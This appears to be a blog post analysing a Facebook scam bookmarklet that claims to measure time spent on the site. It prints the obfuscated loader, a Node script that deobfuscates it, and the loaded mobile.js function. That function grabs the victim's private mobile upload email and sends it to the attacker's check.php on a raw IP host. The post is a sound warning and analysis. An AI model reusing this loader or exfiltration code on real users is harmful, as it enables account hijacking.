Posts tagged Javascript

One of my FB contacts had shared this link on their Facebook Wall: http://174.120.6.98/~tchecks/next.php?id=12132. It claims to run some JavaScript code, after you log in to m.facebook.com, to find out how much time you’ve spent on Facebook.

javascript: var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x34\x2e\x31\x32\x30\x2e\x36\x2e\x39\x38\x2f\x7e\x74\x63\x68\x65\x63\x6b\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script); void(0);

As usual, I never support anyone running any kind of JS in the address bar, so I thought I’d dig through the JS code. That array, in human language, is:

["script", "createElement", "src", "http://174.120.6.98/~tchecks/mobile.js", "appendChild", "body"]
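The hex-escaped array above is a common obfuscation pattern: every string is stored as \x escapes and the code refers to them by index. Below is an added example (my own, not code from the post or from the site it describes) that decodes such an array and rewrites the index lookups into readable property names. The OBFUSCATED constant is the post’s snippet reproduced with straight quotes; the function names decodeEscapes, extractStringArray and deobfuscate are mine.

```javascript
// Added example (not part of the original post): decode the hex-escaped string
// array the bookmarklet uses and rewrite its bracket lookups into readable code.
// OBFUSCATED is the post's snippet with straight quotes; String.raw keeps the
// \x escapes as literal text so the decoding below is done by us, not by JS.
const OBFUSCATED = String.raw`javascript: var _0xbdfc=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3a\x2f\x2f\x31\x37\x34\x2e\x31\x32\x30\x2e\x36\x2e\x39\x38\x2f\x7e\x74\x63\x68\x65\x63\x6b\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];var script=document[_0xbdfc[1]](_0xbdfc[0]);script[_0xbdfc[2]]=_0xbdfc[3];document[_0xbdfc[5]][_0xbdfc[4]](script); void(0);`;

// Decode JavaScript string escapes (\xHH, \uHHHH and the simple ones) in a
// single pass, so a decoded backslash is never re-interpreted by a later pass.
function decodeEscapes(s) {
  const simple = { n: '\n', t: '\t', r: '\r', '0': '\0' };
  return s.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (_, e) => {
    if (e[0] === 'x' || e[0] === 'u') return String.fromCharCode(parseInt(e.slice(1), 16));
    return e in simple ? simple[e] : e; // \" \' \\ map to the character itself
  });
}

// Find the `var _0x....=[ ... ];` declaration and return its name, its decoded
// strings and the raw declaration text (so it can be removed from the output).
function extractStringArray(source) {
  const decl = source.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([\s\S]*?)\]\s*;/);
  if (!decl) return null;
  const strings = [...decl[2].matchAll(/(["'])((?:(?!\1)[^\\]|\\.)*)\1/g)]
    .map((m) => decodeEscapes(m[2]));
  return { name: decl[1], strings, declaration: decl[0] };
}

// Rewrite obj[_0x[i]] as obj.prop (or obj["..."] when the name is not an
// identifier) and a bare _0x[i] as a string literal; strip the javascript:
// prefix and the array declaration. Out-of-range indexes are left untouched.
function deobfuscate(source) {
  const info = extractStringArray(source);
  if (!info) return source;
  const { name, strings, declaration } = info;
  const isIdent = (s) => /^[A-Za-z_$][\w$]*$/.test(s);
  return source
    .replace(/^\s*javascript:\s*/, '')
    .replace(declaration, '')
    .replace(new RegExp(`\\[${name}\\[(\\d+)\\]\\]`, 'g'), (m, i) => {
      const v = strings[Number(i)];
      if (v === undefined) return m;
      return isIdent(v) ? `.${v}` : `[${JSON.stringify(v)}]`;
    })
    .replace(new RegExp(`${name}\\[(\\d+)\\]`, 'g'), (m, i) => {
      const v = strings[Number(i)];
      return v === undefined ? m : JSON.stringify(v);
    })
    .trim();
}

console.log(extractStringArray(OBFUSCATED).strings);
console.log(deobfuscate(OBFUSCATED));
```

Run with `node` and the second line printed is the bookmarklet in plain form: it creates a script element, points its src at the attacker’s mobile.js and appends it to the page body, which is the only thing the “how much time have you spent on Facebook” pitch actually does. The same approach works for any `_0x....` array obfuscator of this family; when the decoded array is the only thing hidden, reading the rewritten code is usually enough to judge the script.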

Now, the important function in that mobile.js file is:

$.get("http://m.facebook.com/upload.php", function(data){
    var mydata = data; var mobiles; var count = 0;
    // Collect the text of every link that mentions m.facebook.com (the per-user upload address).
    // `mobiles` starts out undefined, so the first concatenation yields "undefined...";
    // the replace() below strips that prefix again.
    $($(mydata).find('a').filter(':contains("m.facebook.com")')).each(function(){if(($(this).text() != undefined)){ mobiles += $(this).text() +";";}});
    var clean = mobiles.replace("undefined","");
    var cut = clean.slice(0,clean.length - 1);
    var insert = cut.replace(/;/g,",");
    //Redirect to php inserter which redirects back to next set of steps.
    top.location.href = 'http://174.120.6.98/~tchecks/check.php?get=1&m=,'+insert;
});

This function fetches the page m.facebook.com/upload.php (using your logged-in session), parses it, looks for all links containing m.facebook.com, grabs their text, which is your personal upload email address, and sends it off to the attacker’s check.php in the query string. As per Facebook, that address is:

  • This is *your* personal address - don’t share it with anyone
  • The email subject will be the photo caption if your email contains photos.
  • The email subject will be your updated status if your email contains no photo.
  • Save your upload email as a contact for easy access.

So, now the phisher has your private FB Mobile email address, through which they can post photos to your account or update your status as you.

Moral of the post: Don’t be dumb and run any JavaScript in your browser window if you don’t understand what it does. And install NoScript for Firefox. Users of other browsers, find a similar alternative or get Firefox.
